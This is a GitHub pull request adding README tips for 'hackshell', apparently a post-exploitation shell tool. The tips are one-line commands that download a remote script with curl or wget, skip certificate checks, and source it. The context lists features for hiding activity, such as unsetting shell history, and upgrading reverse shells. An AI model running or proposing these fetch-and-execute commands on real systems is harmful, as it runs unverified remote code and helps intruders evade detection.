### PR TITLE
Adding a tip to ignore SSL / Certificate warnings

### DIFF
--- a/README.md
+++ b/README.md
@@ -10,6 +10,15 @@ Usage:
  source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
 ```
 
+No SSL/TLS alternatives:
+```shell
+ source <(wget --no-check-certificate -q -O- https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
+```
+
+```shell
+ source <(curl -kSsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
+```
+
 Some features:
 *  unsets HISTFILE, SSH_CONNECT, wget/redis/mysql/less-HISTORY, ...
 *  Upgrates to PTY shell (if reverse shell)

--- a/README.md
+++ b/README.md
@@ -12,11 +12,11 @@ Usage:
 
 Ignore SSL / Certificate warnings:
 ```shell
- source <(wget --no-check-certificate -q -O- https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
+ source <(curl -kSsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
 ```
 
 ```shell
- source <(curl -kSsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
+ source <(wget --no-check-certificate -q -O- https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
 ```
 
 Some features:

--- a/README.md
+++ b/README.md
@@ -10,7 +10,7 @@ Usage:
  source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
 ```
 
-No SSL/TLS alternatives:
+Ignore SSL / Certificate warnings:
 ```shell
  source <(wget --no-check-certificate -q -O- https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
 ```


### PR DESCRIPTION
Included a tip to ignore SSL / Certificate warnings in the README.

Old:
![image](https://github.com/user-attachments/assets/b1e0ea22-e3c9-45c9-94de-16488bd73ab7)

New:
![image](https://github.com/user-attachments/assets/f89f0e38-4cee-4f41-919f-d37a16fa6b66)

### Proof of Concept

With `wget`:
![image](https://github.com/user-attachments/assets/30c45bd5-bc5b-4d4f-8e4a-dfcf628ec060)

With `curl`:
![image](https://github.com/user-attachments/assets/3cf8c170-6059-46e1-b5fb-e92a053995ce)
